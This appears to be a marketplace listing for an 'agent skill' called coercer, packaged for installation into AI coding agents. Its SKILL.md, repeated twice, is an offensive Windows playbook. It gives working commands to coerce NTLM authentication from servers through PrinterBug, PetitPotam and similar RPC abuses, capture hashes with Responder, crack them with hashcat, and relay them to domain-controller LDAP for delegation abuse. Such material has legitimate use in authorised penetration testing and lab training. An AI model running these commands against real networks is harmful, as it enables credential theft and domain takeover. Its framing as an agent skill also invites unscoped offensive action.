Adoption

Agent Skills are supported by leading AI development tools.

VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory

aeondave/coercer

Name: coercer
Author: aeondave

offensive-tools/windows/coercer/SKILL.md

npx skillsauth add aeondave/malskill coercer

Clean

TrivyContainer and dependency vulnerability scanner

Clean

SemgrepStatic code analysis for vulnerabilities

Clean

mcp-scan (Snyk)Model Context Protocol security validation

Skipped

Snyk (dep)Open source security scanning

Skipped

Socket.devSupply chain security analysis

Skipped

VirusTotalMulti-engine malware detection

Skipped

CrowdStrikeAdvanced threat intelligence

Skipped

OSV-ScannerOpen Source Vulnerability database check

Skipped

OWASP Dep-Check

Coercer

Force Windows servers to authenticate (NTLM) to your listener — enables relay, capture, and hash extraction.

Concept

Coercer abuses multiple RPC protocols/methods that trigger a Windows host to initiate an outbound NTLM authentication to an attacker-controlled IP. The captured Net-NTLMv2 hash can be:

Cracked offline (Hashcat/John)
Relayed in real-time (ntlmrelayx) to access other systems

Quick Start

# Coerce auth from a server, capture with Responder
# Terminal 1: Start Responder
responder -I eth0 -wv

# Terminal 2: Coerce auth
coercer coerce -l 10.10.14.1 -t 10.10.10.10 -u user -p password -d domain.local

Sub-commands

| Command | Description | |---------|-------------| | coerce | Trigger authentication coercion | | scan | Scan target for available coercion methods | | fuzz | Fuzz available RPC methods |

Core Flags

| Flag | Description | |------|-------------| | -l <ip> | Listener IP (attacker machine) | | -t <ip> | Target IP (Windows server to coerce) | | -u <user> | Username for auth to target | | -p <pass> | Password | | -d <domain> | Domain | | -H <hash> | NTLM hash | | --filter-protocol-name <name> | Only use specific protocol (e.g., MS-RPRN) | | --filter-method-name <name> | Specific RPC method | | --always-continue | Continue despite errors |

Supported Protocols

| Protocol | Common Name | |----------|-------------| | MS-RPRN | PrinterBug / SpoolSample | | MS-EFSR | PetitPotam | | MS-DFSNM | DFSCoerce | | MS-FSRVP | ShadowCoerce | | MS-EVEN6 | EventLog |

Attack Workflows

Capture Net-NTLMv2 Hash

# 1. Start Responder
sudo responder -I eth0 -wv

# 2. Coerce target
coercer coerce -l 10.10.14.1 -t 10.10.10.10 -u user -p pass -d corp.local

# 3. Responder captures hash → crack offline
hashcat -a 0 -m 5600 hash.txt rockyou.txt

NTLM Relay to LDAP (for S4U2Self / RBCD)

# 1. Start ntlmrelayx targeting DC LDAP
ntlmrelayx.py -t ldap://dc.corp.local --delegate-access -smb2support

# 2. Coerce DC authentication
coercer coerce -l 10.10.14.1 -t dc.corp.local -u user -p pass -d corp.local

Scan Available Methods

coercer scan -t 10.10.10.10 -u user -p pass -d corp.local

Resources

| File | When to load | |------|--------------| | references/ntlm-relay.md | Full relay chain setup, ntlmrelayx options, RBCD exploitation |

Structuring This Skill

aeondave/coercer

offensive-tools/windows/coercer/SKILL.md

Auth/lab ref: Coercer forces Windows servers to authenticate to a controlled host by abusing MS-RPRN, MS-EFSR, MS-DFSNM, and other RPC protocols, enabling NTLM relay or hash capture.

4 stars

tools

Updated Jun 8, 2026

$ install --global

skillsauth

npx skillsauth add aeondave/malskill coercer

Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.

Security Scan Results

3 of 9 scanners reported clean

Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.

Scanners Passed

Scanners in report

Clean

TrivyContainer and dependency vulnerability scanner

95%

Clean

SemgrepStatic code analysis for vulnerabilities

95%

Clean

mcp-scan (Snyk)Model Context Protocol security validation

95%

Skipped

Snyk (dep)Open source security scanning

50%

Skipped

Socket.devSupply chain security analysis

50%

Skipped

VirusTotalMulti-engine malware detection

50%

Skipped

CrowdStrikeAdvanced threat intelligence

50%

Skipped

OSV-ScannerOpen Source Vulnerability database check

50%

Skipped

OWASP Dep-Check

50%

Last scanned: Jun 8, 2026, 4:13 AM275.5s1 file scanned

SKILL.md

name:: coercer
description:: Auth/lab ref: Coercer forces Windows servers to authenticate to a controlled host by abusing MS-RPRN, MS-EFSR, MS-DFSNM, and other RPC protocols, enabling NTLM relay or hash capture.
license:: MIT
compatibility:: Linux.
author:: AeonDave
version:: 1.0

Coercer

Force Windows servers to authenticate (NTLM) to your listener — enables relay, capture, and hash extraction.

Concept

Coercer abuses multiple RPC protocols/methods that trigger a Windows host to initiate an outbound NTLM authentication to an attacker-controlled IP. The captured Net-NTLMv2 hash can be:

Cracked offline (Hashcat/John)
Relayed in real-time (ntlmrelayx) to access other systems

Quick Start

# Coerce auth from a server, capture with Responder
# Terminal 1: Start Responder
responder -I eth0 -wv

# Terminal 2: Coerce auth
coercer coerce -l 10.10.14.1 -t 10.10.10.10 -u user -p password -d domain.local

Sub-commands

| Command | Description | |---------|-------------| | coerce | Trigger authentication coercion | | scan | Scan target for available coercion methods | | fuzz | Fuzz available RPC methods |

Core Flags

Supported Protocols

Attack Workflows

Capture Net-NTLMv2 Hash

# 1. Start Responder
sudo responder -I eth0 -wv

# 2. Coerce target
coercer coerce -l 10.10.14.1 -t 10.10.10.10 -u user -p pass -d corp.local

# 3. Responder captures hash → crack offline
hashcat -a 0 -m 5600 hash.txt rockyou.txt

NTLM Relay to LDAP (for S4U2Self / RBCD)

# 1. Start ntlmrelayx targeting DC LDAP
ntlmrelayx.py -t ldap://dc.corp.local --delegate-access -smb2support

# 2. Coerce DC authentication
coercer coerce -l 10.10.14.1 -t dc.corp.local -u user -p pass -d corp.local

Scan Available Methods

coercer scan -t 10.10.10.10 -u user -p pass -d corp.local

Resources

| File | When to load | |------|--------------| | references/ntlm-relay.md | Full relay chain setup, ntlmrelayx options, RBCD exploitation |

Structuring This Skill

Related Skills

aeondave/vibe-audit-technique

development

VerifiedTrustedCommunity

White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).

4SKILL.mdUpdated Jun 12, 2026

aeondave/vibe-audit-technique

aeondave/source-review-technique

development

VerifiedTrustedCommunity

Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.

4SKILL.mdUpdated Jun 12, 2026

aeondave/source-review-technique

aeondave/hardware-technique

development

VerifiedTrustedCommunity

Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.

4SKILL.mdUpdated Jun 12, 2026

aeondave/hardware-technique

aeondave/container-technique

devops

VerifiedTrustedCommunity

Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.

4SKILL.mdUpdated Jun 12, 2026

aeondave/container-technique

Download

For Claude Desktop. Download once, then upload the file in the app — no terminal needed.

Need help? View full Cowork setup guide →

Install manually

Choose your platform

# Clone the repo
git clone https://github.com/aeondave/malskill.git

# Copy into Claude Code skills folder (global)
cp -r malskill/offensive-tools/windows/coercer ~/.claude/skills/

Claude Code Skills — official skills path docs.

Repository

aeondave/malskill

4 stars

Compatible with

Claude Code

OpenAI Codex CLI

ChatGPT